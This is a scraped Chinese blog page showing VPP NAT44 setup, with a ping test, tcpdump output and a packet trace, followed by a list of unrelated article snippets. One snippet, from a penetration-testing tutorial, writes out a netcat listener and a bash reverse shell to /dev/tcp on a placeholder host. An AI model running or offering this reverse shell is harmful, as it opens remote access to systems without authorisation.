  7. srv6am_plugin.so                         18.10-13~g00adccea               Masquerading SRv6 proxy
  8. ila_plugin.so                            18.10-13~g00adccea               Identifier-locator addressing for IPv6
  9. l2e_plugin.so                            18.10-13~g00adccea               L2 Emulation
 10. tlsopenssl_plugin.so                     18.10-13~g00adccea               openssl based TLS Engine
 11. gtpu_plugin.so                           18.10-13~g00adccea               GTPv1-U
 12. map_plugin.so                            18.10-13~g00adccea               Mapping of address and port (MAP)
 13. stn_plugin.so                            18.10-13~g00adccea               VPP Steals the NIC for Container integration
 14. acl_plugin.so                            18.10-13~g00adccea               Access Control Lists
 15. cdp_plugin.so                            18.10-13~g00adccea               
 16. lacp_plugin.so                           18.10-13~g00adccea               Link Aggregation Control Protocol
 17. flowprobe_plugin.so                      18.10-13~g00adccea               Flow per Packet
 18. svs_plugin.so                            18.10-13~g00adccea               Source VRF Select
 19. nsim_plugin.so                           18.10-13~g00adccea               network delay simulator plugin
 20. mactime_plugin.so                        18.10-13~g00adccea               Time-based MAC source-address filter
 21. lb_plugin.so                             18.10-13~g00adccea               Load Balancer
 22. srv6as_plugin.so                         18.10-13~g00adccea               Static SRv6 proxy
 23. srv6ad_plugin.so                         18.10-13~g00adccea               Dynamic SRv6 proxy
 24. vmxnet3_plugin.so                        18.10-13~g00adccea               VMWare Vmxnet3 Device Plugin
 25. gbp_plugin.so                            18.10-13~g00adccea               Group Based Policy
 26. igmp_plugin.so                           18.10-13~g00adccea               IGMP messaging
 27. nat_plugin.so                            18.10-13~g00adccea               Network Address Translation

没有snat_plugin.so, 但是有nat_plugin.so. 经过尝试也可以继续配置

VPP配置NAT

vpp# nat44 add interface address host-vpp1outside
vpp# set interface nat44 in host-vpp1inside out host-vpp1outside
vpp# 
vpp# show nat44 interface address host-vpp1inside   
NAT44 pool address interfaces:
 host-vpp1outside
NAT44 twice-nat pool address interfaces:
unknown input `host-vpp1inside'
vpp# 
vpp# show nat44 interface address host-vpp1outside
NAT44 pool address interfaces:
 host-vpp1outside
NAT44 twice-nat pool address interfaces:
unknown input `host-vpp1outside'
vpp#

测试NAT

从主机66.6.2.1 ping 66.6.1.1

根据路由Nexthop为66.6.2.2,也就VPP host-vpp1inside口

ICMP包经过VPP的NAT,从66.6.1.2出到主机66.6.1.1 


[ckun@localhost vpp_plugins]$ sudo ip netns exec inside ping -c 1 66.6.1.1
PING 66.6.1.1 (66.6.1.1) 56(84) bytes of data.
64 bytes from 66.6.1.1: icmp_seq=1 ttl=63 time=0.125 ms

--- 66.6.1.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.125/0.125/0.125/0.000 ms

[ckun@localhost ~]$ sudo tcpdump -i vpp1outsidehost -s 0
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on vpp1outsidehost, link-type EN10MB (Ethernet), capture size 262144 bytes
14:54:29.290420 IP 66-6-1-2.d2.itctel.com > 66-6-1-1.d2.itctel.com: ICMP echo request, id 25801, seq 1, length 64
14:54:29.290440 IP 66-6-1-1.d2.itctel.com > 66-6-1-2.d2.itctel.com: ICMP echo reply, id 25801, seq 1, length 64
^C
2 packets captured
2 packets received by filter
0 packets dropped by kernel
[ckun@localhost ~]$ 

vpp# trace add af-packet-input 10
vpp# 
vpp# show trace 
------------------- Start of thread 0 vpp_main -------------------
Packet 1

03:46:53:080613: af-packet-input
  af_packet: hw_if_index 2 next-index 4
    tpacket2_hdr:
      status 0x20000001 len 98 snaplen 98 mac 66 net 80
      sec 0x5c00dea5 nsec 0x114e84e9 vlan 0 vlan_tpid 0
03:46:53:080623: ethernet-input
  IP4: 76:97:dd:07:3b:cf -> 02:fe:69:50:a2:c5
03:46:53:080629: ip4-input
  ICMP: 66.6.2.1 -> 66.6.1.1
    tos 0x00, ttl 64, length 84, checksum 0x06c8
    fragment id 0xacd3, flags DONT_FRAGMENT
  ICMP echo_request checksum 0x5513
03:46:53:080631: nat44-in2out
  NAT44_IN2OUT_FAST_PATH: sw_if_index 2, next index 3, session -1
03:46:53:080633: nat44-in2out-slowpath
  NAT44_IN2OUT_SLOW_PATH: sw_if_index 2, next index 0, session 4
03:46:53:080643: ip4-lookup
  fib 0 dpo-idx 3 flow hash: 0x00000000
  ICMP: 66.6.1.2 -> 66.6.1.1
    tos 0x00, ttl 64, length 84, checksum 0x07c7
    fragment id 0xacd3, flags DONT_FRAGMENT
  ICMP echo_request checksum 0x5ba
03:46:53:080648: ip4-rewrite
  tx_sw_if_index 1 dpo-idx 3 : ipv4 via 66.6.1.1 host-vpp1outside: mtu:9000 f69c3440da9602fe3319c6f70800 flow hash: 0x00000000
  00000000: f69c3440da9602fe3319c6f7080045000054acd340003f0108c7420601024206
  00000020: 0101080005ba64c90001a5de005c00000000246e0400000000001011
03:46:53:080650: host-vpp1outside-output
  host-vpp1outside
  IP4: 02:fe:33:19:c6:f7 -> f6:9c:34:40:da:96
  ICMP: 66.6.1.2 -> 66.6.1.1
    tos 0x00, ttl 63, length 84, checksum 0x08c7
    fragment id 0xacd3, flags DONT_FRAGMENT
  ICMP echo_request checksum 0x5ba

Packet 2

03:46:53:080692: af-packet-input
  af_packet: hw_if_index 1 next-index 4
    tpacket2_hdr:
      status 0x20000001 len 98 snaplen 98 mac 66 net 80
      sec 0x5c00dea5 nsec 0x114fc9d1 vlan 0 vlan_tpid 0

 

你可能感兴趣的:(VPP)

  • Docker容器如何与主机同网段其它主机互通? lingshengxiyou linuxDPDKc++docker容器linux服务器后台开发
    一、前言1、使用场景对开发者而言,随着容器的普遍使用,开发者可以很方便的搭建项目的简易测试环境。有时候为了项目可以在任意机器一键运行,不用配置连接IP等信息。所以希望可以提前固定容器的IP地址,而且一个项目有时候涉及多个容器,可能还会部署在多台机器上。所以如果容器间可以固定IP跨机器通信的话,会有很大方便。(免费订阅,永久学习)学习地址:Dpdk/网络协议栈/vpp/OvS/DDos/NFV/虚拟
  • 常见 反弹shell的方法 A 八方 安全
    在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。Bash反弹1.1方法一攻击者主机上执行监听:nc-lvvpport目标主机上执行:bash-i>&/dev/tcp/x.x.x.x/port0>&1#bash-i打开
  • 开发者可申请更多时间完成 Google Play 付款政策合规 谷歌开发者
    image作者/PurnimaKochikar,VPPlayPartnerships我们与开发者们合作的每一天,都在为每个人打造安全、可靠和流畅的GooglePlay体验,并确保开发者们能在此打造可持续发展的业务。在去年9月,我们对付款政策进行了阐述,明确给出了开发者采用GooglePlay结算系统的时间要求。虽然大多数开发者已经遵守了这项政策,但我们知道一些使用其他结算系统的开发者可能需要对其既
  • VPP学习-VPP初始化流程 进化中的码农 学习
    概念VPP作为一个开源的、高性能的用户态网络协议栈,以进程的形式运行于Linux或(类unix)系统下,即VPP实际是一个用户进程,VPP启动后可通过"ps-ef|grepvpp"命令查看。VPP启动用户态进程启动都有一个main函数即程序入口函数,VPP也不例外,VPPmain函数位于/src/vpp/net/main.c中,主要做了如下工作:1)加载并解析VPP配置文件startup.conf
  • VPP学习-startup.conf配置文件 进化中的码农 学习网络
    背景VPP(VectorPacketProcessing,矢量报文处理),作为一个开源的高性能数据包处理框架,旨在提供可扩展、灵活且高效的网络数据包处理能力;由于传统Linux内核协议栈整体网络吞吐性能的局限性,目前VPP已被广泛运用于路由器、防火墙等网络设备上,因此,作为网络开发工程师,在熟悉Linux内核协议栈的同时,有必要对VPP用户态协议栈有所了解,了解其实现原理、编码特点,报文处理方式以
  • C __attribute__编译属性整理 进化中的码农 c语言开发语言
    背景最近在看VPP源码,很多变量、函数都设置了编译属性,编译属性的作用却不是很明确,为了增加记忆以及方便日后查阅,在此整理并分享给大家。概念__attribute__是GCC的一大特色,attribute机制可以用于设置函数属性(FunctionAttribute)、变量属性(VariableAttribute)和类型属性(TypeAttribute)编译属性及作用__attribute__((u
  • 编曲学习:和弦编配(下) 和弦进行 转位和弦 Leading bass 诗书画唱 学习
    34届和弦编配(下)和弦进行转位和弦Leadingbasshttps://app8epdhy0u9502.pc.xiaoe-tech.com/live_pc/l_65b88129e4b04c10a1291067?course_id=course_2XLKtQnQx9GrQHac7OPmHD9tqbvPPThttps://app8epdhy0u9502.pc.xiaoe-tech.com/p/t_p
  • VCC、 VDD、VEE、VSS区别 创客乌托邦
    版本一:简单说来,可以这样理解:一、解释VCC:C=circuit表示电路的意思,即接入电路的电压;VDD:D=device表示器件的意思,即器件内部的工作电压;VSS:S=series表示公共连接的意思,通常指电路公共接地端电压;VEE:负电压供电;VPP:编程/擦除电压。二、说明1、对于数字电路来说,VCC是电路的供电电压,VDD是芯片的工作电压(通常Vcc>Vdd),VSS是接地点。2、有些
  • 清翔51单片机学习笔记-中断系统 2301_80163363 51单片机学习笔记
    一,基础内容1,51单片机个引脚功能回顾引脚总共分为四种1.电源引脚Vcc:+5V电源Vss:接地2.时钟引脚XTL1,XTL23.控制引脚RST:复位信号输入端(RST为高电平时复位)Vpd:备用电源输入端EA:内外部程序储存选择端(EA为高电平时访问内部,低电平访问外部)(因为现在单片机内部空间够用所以一般只用高电平)Vpp编程电压输入端(现在用不到了)ALE地址锁存允许信号(现在用不到了)P
  • 学习的旅行 8云8
    图片发自App上次去威海参加樊登老师的讲座,在威海玩了一天;今天参加头马的COT培训,也是在青岛玩了一天的,这种身体和灵魂都在路上的旅行,是件疯狂的事情。今日火车偶遇Coconut,第一次吃牛丼(dong);坐车去到青岛朗讯基地,参加中区培训;又到青岛大学餐厅吃小火锅,晚上八点半去五四广场。一天过的很充实。今天的收获:作为VPPR,要清楚参会嘉宾的需求,是要学习英语,还是练习演讲,通过需求突出海报
  • (C# -VisionPro) New VisionPro Vision file (.vpp) XBruce
    usingCognex.VisionPro;usingCognex.VisionPro.ToolBlock;usingCognex.VisionPro.Exceptions;usingCognex.VisionPro.PMAlign;usingCognex.VisionPro.Display;usingSystem.Drawing;usingCognex.VisionPro.CalibFix;//
  • 我理解的虚拟电厂 杜占坤
    概念虚拟电厂:是一种通过先进信息通信技术和软件系统,实现DG、储能系统、可控负荷、电动汽车等DER的聚合和协调优化,以作为一个特殊电厂参与电力市场和电网运行的电源协调管理系统。-此概念解释摘自百度百科。虚拟电厂:VirtualPowerPlant,简称VPP。DG:distributedgenerator,分布式电源。DER:distributedenergyresource,分布式能源。DER包
  • 【VPP 】将编译好的VPP安装到系统 roshy 服务器linux运维
    将编译好的VPP安装到系统中cpbuild-root/install-vpp-native/vpp/include/*/usr/include/-rcpbuild-root/install-vpp-native/vpp/lib/*/lib64/-rcpbuild-root/install-vpp-native/vpp/lib/vpp_plugins/lib/-rcpbuild-root/insta
  • NAT44-ED features及节点图 redwingz VPPnatsession
    VPP配置SNAT,内网接口GigabitEthernet2/0/0,外网接口GigabitEthernet3/0/0,NAT之后的地址为GigabitEthernet3/0/0接口的地址。vpp#setinterfacestateGigabitEthernet2/0/0upvpp#setinterfacestateGigabitEthernet3/0/0upvpp#vpp#setinterfac
  • element-ui的选择实现上拉刷新和回显 造糖主义 vuevue.js前端
    **初始化回显凑一项在数组push进去//初始化添加数组initResourcePage(){returnresourcePage({...this.devArrForm}).then(res=>{const{result}=res.datathis.vppDevListArrLength=res.data.totallettempObj=result.find(item=>item.id===t
  • quest_template weixin_51122280 TrinityCore任务数据表开源
    目录任务参数任务限定任务文本及描述任务需求quest_template(主要字段介绍)任务参数QuestType0:接受任务时直接跳过任务目标和任务细节,自动完成任务1:任务未启用2:任务启用3:世界任务QuestInfo取值参考QuestInfo.dbc|QuestInfo.db2IDNameComments1Group组队任务21Life生活?41PvPPVP任务62Raid团队任务81Dun
  • 《mulphash》 ipursuitveux
    Recurtotheclassiclegend,thewarrior,themage,theTaoistthreemajorcareersreappear,andgotothejourneywithyou.TheabundanceofPVEandPVPplay,thewholemapfreePK,anewinterserviceplay,theclassicalheritageatthesamet
  • [VPP] vpp_com使用 橙留香写代码 网络协议网络c++c语言
    vppcom_server.c#include#include#include#include#include//vppcom//./vppcom_server192.168.0.298888intmain(intargc,char*argv[]){intrv=0;printf("vppcomserver:%d\n",argc);if(argc#include#include#include#in
  • VPP配置指南:基于IKEv2的IPsec VPN Danileaf_Guo
    正文共:1024字13图,预估阅读时间:1分钟现在,我们已经能够熟练地部署VPP了(不用半小时,最快8分钟即可在CentOS上完成VPP的部署),而且已经能够满足基本的转发要求,那今天我们就来介绍一下VPP如何配置IPsecVPN。前面,我们已经讲了几十篇和VPN相关的文章了,有需要的小伙伴请参考合集(VPN合集)。简单回顾一下,IPsec(IPSecurity,IP安全)是IETF制定的三层(网
  • 修改安卓apk设置为安卓主屏幕(launcher) 远方0905 androiduniapp前端
    修改安卓apk将apk可以设置安卓主屏幕原理:将打包好的apk文件进行拆包增加配置文件在重新编译回apk包需要得相关文件下载解包apktool:https://pan.baidu.com/s/1oyCIYak_MHDJCvDbHj_qEA?pwd=5j2xdex2jar:https://pan.baidu.com/s/1Nc-0vppVd0GPnD6_Y-SRBA?pwd=cmkejd-gui:h
  • VPP配置指南:NAT“三板斧” Danileaf_Guo 智能路由器网络
    正文共:1024字15图,预估阅读时间:1分钟前面我们介绍过VSR的NAT配置(地址重叠时,用户如何通过NAT访问对端IP网络?地址重叠的时候怎么使用NAT解决访问问题,看这里),可以说是很简单的操作了。那VPP的NAT该如何配置呢?我们今天就用一个简易环境来简单介绍一下。设备组网如下图所示:我们首先配置好设备互联,VPP72的接口配置如下:vppctlsetintstateeth1upvppct
  • linux重启jar包的脚本 不恋水的雨 linuxpython运维
    #!/bin/bash#jar包名称NG_NAME=investmentPROCESS=`ps-ef|grep$NG_NAME|grep-vgrep|grep-vPPID|awk'{print$2}'`if[${tpid}];thenecho'StopProcess...'foriin$PROCESSdokill-9$iecho"终止$1进程号[$i]"donefisleep3PROCESS=`p
  • Jupyter Notebook又一地理数据可视化扩展! qq_21478261 信息可视化jupyterpython开发语言生物信息
    本次分享一个JupyterNotebook地理数据可视化扩展:pyl7vppyl7vp=Python+l7vp,如其名,是l7vp在Python3方向的封装,l7vp是蚂蚁集团AntV数据可视化团队开发的地理空间智能应用研发开源平台。通过pyl7vp可在JupyterNotebook中轻松完成地理数据交互式分析!pyl7vp安装pipinstallpyl7vp-ihttps://pypi.tuna
  • android mvp模式例子_ANDROID MVP 模式 简单易懂的介绍方式 weixin_39978863 androidmvp模式例子
    AndroidMVPPatternAndroidMVP模式1也不是什么新鲜的东西了,我在自己的项目里也普遍地使用了这个设计模式。当项目越来越庞大、复杂,参与的研发人员越来越多的时候,MVP模式的优势就充分显示出来了。导读:MVP模式是MVC模式在Android上的一种变体,要介绍MVP就得先介绍MVC。在MVC模式中,Activity应该是属于View这一层。而实质上,它既承担了View,同时也包
  • VPP使用DPDK纳管主机网卡 Danileaf_Guo
    正文共:888字24图,预估阅读时间:1分钟我们之前安装的VPP版本是20.09(安装一个VPP20.09),现在看官网版本已经更新到22.06.0了。我们先用命令yumupdatevpp-y看一下YUM仓库里面更新版本了没有。确认一下。确实,仓库里面最新版本还是20.09,那就还用这个版本吧。在DPDK官网,关于部署有相关文档,但是没有和VPP对应的20.09这个版本,所以我选择安装20.11这
  • 安装一个开源虚拟路由器VPP-20.09 Danileaf_Guo 开源
    首先部署一台CentOS7的主机,版本是多少无所谓,反正一update就都是最新的了。配置我给了给了8核CPU、8GB内存、60GB硬盘,试试效果。安装过程不多说,可以看到,安装完成的系统版本为7.5.1804。使用以下命令更新操作系统。yumlistyumupdate-y查看更新后的操作系统,可以看到系统版本为7.9.2009。[root@localhost~]#cat/etc/system-r
  • VPP向量包处理引擎(Vector Packet Processing)的原理、安装、配置和案例 robot_test_boy
    VPP中文名为向量包处理引擎,英文名是VectorPacketProcessing,是Cisco2002年开发的商用代码。2016年2月11号,Linux基金会创建FD.io项目。Cisco将VPP代码的开源版本加入该项目,目前已成为该项目的核心。(对于向量的理解,还停留在高中数学阶段,顾名思义是有起点和终点的)。原理VPP运行于用户空间,支持多种收包方式,常用的是DPDK。VPP主要有两个主要功
  • VPP/Build, install, and test images booming2 vppvpp
    VPP/Build,install,andtestimagesLastupdated3monthsagoisthedirectorywhereyouunzippedorclonedtheVPPsoftware.)cd/build-root/vagrant/NOTE:The.../build-rootdirectorycontainsthefilesthatmakeupmostofthebuilds
  • 123、第二十四章 刻意的追求,注定不会天长地久——希言自然 小雯同学Echo
    https://mp.weixin.qq.com/s/SQlaRNDOQPVPPJqDMPGQSA各位朋友大家好,今天我们接着来聊《道德经》。前边大家的留言我都看了,写的感想我也看了,我真的没想到大家感想写的这么好。而且这个《道德经》给大家带来这么多的变化、这么多的提升,让我特别开心,真的非常感动。我自己在讲《道德经》的过程中,说实话我自己也在不断地提升、也在学习,所以我们一起进步。上次我们讲到二
  • vp与vs联合开发-通过CogAcqFifoTool工具连接相机 随风1987 数码相机c#
    1.完成相机硬件配置后2.完成vp与vs联合开发配置功能后1.创建winform项目目的:搭建界面应用2.1.vpp文件存入项目的debug目录中目的:在项目中加载本地vpp文件读取相机工具1.控件CogRecordDisplay用于显示相机拍摄照片和实施显示的窗口2和3分别控制按钮事件执行拍照功能和实时显示功能封装相机管理类在窗体类中实现以上功能1.acq工具设计界面-CogAcqFifoEdi
  • SAX解析xml文件 小猪猪08 xml
    1.创建SAXParserFactory实例 2.通过SAXParserFactory对象获取SAXParser实例 3.创建一个类SAXParserHander继续DefaultHandler,并且实例化这个类 4.SAXParser实例的parse来获取文件     public static void main(String[] args) { //
  • 为什么mysql里的ibdata1文件不断的增长? brotherlamp linuxlinux运维linux资料linux视频linux运维自学
    我们在 Percona 支持栏目经常收到关于 MySQL 的 ibdata1 文件的这个问题。 当监控服务器发送一个关于 MySQL 服务器存储的报警时,恐慌就开始了 —— 就是说磁盘快要满了。 一番调查后你意识到大多数地盘空间被 InnoDB 的共享表空间 ibdata1 使用。而你已经启用了 innodbfileper_table,所以问题是: ibdata1存了什么? 当你启用了 i
  • Quartz-quartz.properties配置 eksliang quartz
    其实Quartz JAR文件的org.quartz包下就包含了一个quartz.properties属性配置文件并提供了默认设置。如果需要调整默认配置,可以在类路径下建立一个新的quartz.properties,它将自动被Quartz加载并覆盖默认的设置。   下面是这些默认值的解释 #-----集群的配置 org.quartz.scheduler.instanceName =
  • informatica session的使用 18289753290 workflowsessionlogInformatica
    如果希望workflow存储最近20次的log,在session里的Config  Object设置,log  options做配置,save  session log :sessions  run  ;savesessio log for  these runs:20 session下面的source 里面有个tracing 
  • Scrapy抓取网页时出现CRC check failed 0x471e6e9a != 0x7c07b839L的错误 酷的飞上天空 scrapy
    Scrapy版本0.14.4 出现问题现象: ERROR: Error downloading <GET http://xxxxx  CRC check failed   解决方法   1.设置网络请求时的header中的属性'Accept-Encoding': '*;q=0'   明确表示不支持任何形式的压缩格式,避免程序的解压
  • java Swing小集锦 永夜-极光 java swing
    1.关闭窗体弹出确认对话框   1.1   this.setDefaultCloseOperation (JFrame.DO_NOTHING_ON_CLOSE);   1.2   this.addWindowListener ( new WindowAdapter () { public void windo
  • 强制删除.svn文件夹 随便小屋 java
              在windows上,从别处复制的项目中可能带有.svn文件夹,手动删除太麻烦,并且每个文件夹下都有。所以写了个程序进行删除。因为.svn文件夹在windows上是只读的,所以用File中的delete()和deleteOnExist()方法都不能将其删除,所以只能采用windows命令方式进行删除
  • GET和POST有什么区别?及为什么网上的多数答案都是错的。 aijuans get post
        如果有人问你,GET和POST,有什么区别?你会如何回答? 我的经历      前几天有人问我这个问题。我说GET是用于获取数据的,POST,一般用于将数据发给服务器之用。     这个答案好像并不是他想要的。于是他继续追问有没有别的区别?我说这就是个名字而已,如果服务器支持,他完全可以把G
  • 谈谈新浪微博背后的那些算法 aoyouzi 谈谈新浪微博背后的那些算法
    本文对微博中常见的问题的对应算法进行了简单的介绍,在实际应用中的算法比介绍的要复杂的多。当然,本文覆盖的主题并不全,比如好友推荐、热点跟踪等就没有涉及到。但古人云“窥一斑而见全豹”,希望本文的介绍能帮助大家更好的理解微博这样的社交网络应用。 微博是一个很多人都在用的社交应用。天天刷微博的人每天都会进行着这样几个操作:原创、转发、回复、阅读、关注、@等。其中,前四个是针对短博文,最后的关注和@则针
  • Connection reset 连接被重置的解决方法 百合不是茶 java字符流连接被重置
    流是java的核心部分,,昨天在做android服务器连接服务器的时候出了问题,就将代码放到java中执行,结果还是一样连接被重置   被重置的代码如下;   客户端代码; package 通信软件服务器; import java.io.BufferedWriter; import java.io.OutputStream; import java.io.O
  • web.xml配置详解之filter bijian1013 javaweb.xmlfilter
    一.定义 <filter> <filter-name>encodingfilter</filter-name> <filter-class>com.my.app.EncodingFilter</filter-class> <init-param> <param-name>encoding<
  • Heritrix Bill_chen 多线程xml算法制造配置管理
    作为纯Java语言开发的、功能强大的网络爬虫Heritrix,其功能极其强大,且扩展性良好,深受热爱搜索技术的盆友们的喜爱,但它配置较为复杂,且源码不好理解,最近又使劲看了下,结合自己的学习和理解,跟大家分享Heritrix的点点滴滴。 Heritrix的下载(http://sourceforge.net/projects/archive-crawler/)安装、配置,就不罗嗦了,可以自己找找资
  • 【Zookeeper】FAQ bit1129 zookeeper
    1.脱离IDE,运行简单的Java客户端程序 #ZkClient是简单的Zookeeper~$ java -cp "./:zookeeper-3.4.6.jar:./lib/*" ZKClient    1. Zookeeper是的Watcher回调是同步操作,需要添加异步处理的代码 2. 如果Zookeeper集群跨越多个机房,那么Leader/
  • The user specified as a definer ('aaa'@'localhost') does not exist 白糖_ localhost
    今天遇到一个客户BUG,当前的jdbc连接用户是root,然后部分删除操作都会报下面这个错误:The user specified as a definer ('aaa'@'localhost') does not exist 最后找原因发现删除操作做了触发器,而触发器里面有这样一句 /*!50017 DEFINER = ''aaa@'localhost' */  原来最初
  • javascript中showModelDialog刷新父页面 bozch JavaScript刷新父页面showModalDialog
    在页面中使用showModalDialog打开模式子页面窗口的时候,如果想在子页面中操作父页面中的某个节点,可以通过如下的进行:       window.showModalDialog('url',self,‘status...’); // 首先中间参数使用self       在子页面使用w
  • 编程之美-买书折扣 bylijinnan 编程之美
    import java.util.Arrays; public class BookDiscount { /**编程之美 买书折扣 书上的贪心算法的分析很有意思,我看了半天看不懂,结果作者说,贪心算法在这个问题上是不适用的。。 下面用动态规划实现。 哈利波特这本书一共有五卷,每卷都是8欧元,如果读者一次购买不同的两卷可扣除5%的折扣,三卷10%,四卷20%,五卷
  • 关于struts2.3.4项目跨站执行脚本以及远程执行漏洞修复概要 chenbowen00 strutsWEB安全
    因为近期负责的几个银行系统软件,需要交付客户,因此客户专门请了安全公司对系统进行了安全评测,结果发现了诸如跨站执行脚本,远程执行漏洞以及弱口令等问题。 下面记录下本次解决的过程以便后续 1、首先从最简单的开始处理,服务器的弱口令问题,首先根据安全工具提供的测试描述中发现应用服务器中存在一个匿名用户,默认是不需要密码的,经过分析发现服务器使用了FTP协议, 而使用ftp协议默认会产生一个匿名用
  • [电力与暖气]煤炭燃烧与电力加温 comsci
          在宇宙中,用贝塔射线观测地球某个部分,看上去,好像一个个马蜂窝,又像珊瑚礁一样,原来是某个国家的采煤区.....       不过,这个采煤区的煤炭看来是要用完了.....那么依赖将起燃烧并取暖的城市,在极度严寒的季节中...该怎么办呢?   &nbs
  • oracle O7_DICTIONARY_ACCESSIBILITY参数 daizj oracle
    O7_DICTIONARY_ACCESSIBILITY参数控制对数据字典的访问.设置为true,如果用户被授予了如select any table等any table权限,用户即使不是dba或sysdba用户也可以访问数据字典.在9i及以上版本默认为false,8i及以前版本默认为true.如果设置为true就可能会带来安全上的一些问题.这也就为什么O7_DICTIONARY_ACCESSIBIL
  • 比较全面的MySQL优化参考 dengkane mysql
    本文整理了一些MySQL的通用优化方法,做个简单的总结分享,旨在帮助那些没有专职MySQL DBA的企业做好基本的优化工作,至于具体的SQL优化,大部分通过加适当的索引即可达到效果,更复杂的就需要具体分析了,可以参考本站的一些优化案例或者联系我,下方有我的联系方式。这是上篇。   1、硬件层相关优化   1.1、CPU相关   在服务器的BIOS设置中,可
  • C语言homework2,有一个逆序打印数字的小算法 dcj3sjt126com c
    #h1#   0、完成课堂例子 1、将一个四位数逆序打印 1234 ==> 4321 实现方法一: # include <stdio.h> int main(void) { int i = 1234; int one = i%10; int two = i / 10 % 10; int three = i / 100 % 10;
  • apacheBench对网站进行压力测试 dcj3sjt126com apachebench
       ab 的全称是 ApacheBench , 是 Apache 附带的一个小工具 , 专门用于 HTTP Server 的 benchmark testing , 可以同时模拟多个并发请求。前段时间看到公司的开发人员也在用它作一些测试,看起来也不错,很简单,也很容易使用,所以今天花一点时间看了一下。 通过下面的一个简单的例子和注释,相信大家可以更容易理解这个工具的使用。
  • 2种办法让HashMap线程安全 flyfoxs javajdkjni
    多线程之--2种办法让HashMap线程安全 多线程之--synchronized 和reentrantlock的优缺点 多线程之--2种JAVA乐观锁的比较( NonfairSync VS. FairSync)     HashMap不是线程安全的,往往在写程序时需要通过一些方法来回避.其实JDK原生的提供了2种方法让HashMap支持线程安全.  
  • Spring Security(04)——认证简介 234390216 Spring Security认证过程
    认证简介 目录 1.1     认证过程 1.2     Web应用的认证过程 1.2.1    ExceptionTranslationFilter 1.2.2    在request之间共享SecurityContext   1
  • Java 位运算 Javahuhui java位运算
    // 左移( << ) 低位补0 // 0000 0000 0000 0000 0000 0000 0000 0110 然后左移2位后,低位补0: // 0000 0000 0000 0000 0000 0000 0001 1000 System.out.println(6 << 2);// 运行结果是24 // 右移( >> ) 高位补"
  • mysql免安装版配置 ldzyz007 mysql
    1、my-small.ini是为了小型数据库而设计的。不应该把这个模型用于含有一些常用项目的数据库。 2、my-medium.ini是为中等规模的数据库而设计的。如果你正在企业中使用RHEL,可能会比这个操作系统的最小RAM需求(256MB)明显多得多的物理内存。由此可见,如果有那么多RAM内存可以使用,自然可以在同一台机器上运行其它服务。 3、my-large.ini是为专用于一个SQL数据
  • MFC和ado数据库使用时遇到的问题 你不认识的休道人 sqlC++mfc
    =================================================================== 第一个 =================================================================== try{ CString sql; sql.Format("select * from p
  • 表单重复提交Double Submits rensanning double
    可能发生的场景: *多次点击提交按钮 *刷新页面 *点击浏览器回退按钮 *直接访问收藏夹中的地址 *重复发送HTTP请求(Ajax) (1)点击按钮后disable该按钮一会儿,这样能避免急躁的用户频繁点击按钮。 这种方法确实有些粗暴,友好一点的可以把按钮的文字变一下做个提示,比如Bootstrap的做法: http://getbootstrap.co
  • Java String 十大常见问题 tomcat_oracle java正则表达式
     1.字符串比较,使用“==”还是equals()?   "=="判断两个引用的是不是同一个内存地址(同一个物理对象)。   equals()判断两个字符串的值是否相等。   除非你想判断两个string引用是否同一个对象,否则应该总是使用equals()方法。   如果你了解字符串的驻留(String Interning)则会更好地理解这个问题。    
  • SpringMVC 登陆拦截器实现登陆控制 xp9802 springMVC
    思路,先登陆后,将登陆信息存储在session中,然后通过拦截器,对系统中的页面和资源进行访问拦截,同时对于登陆本身相关的页面和资源不拦截。   实现方法: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他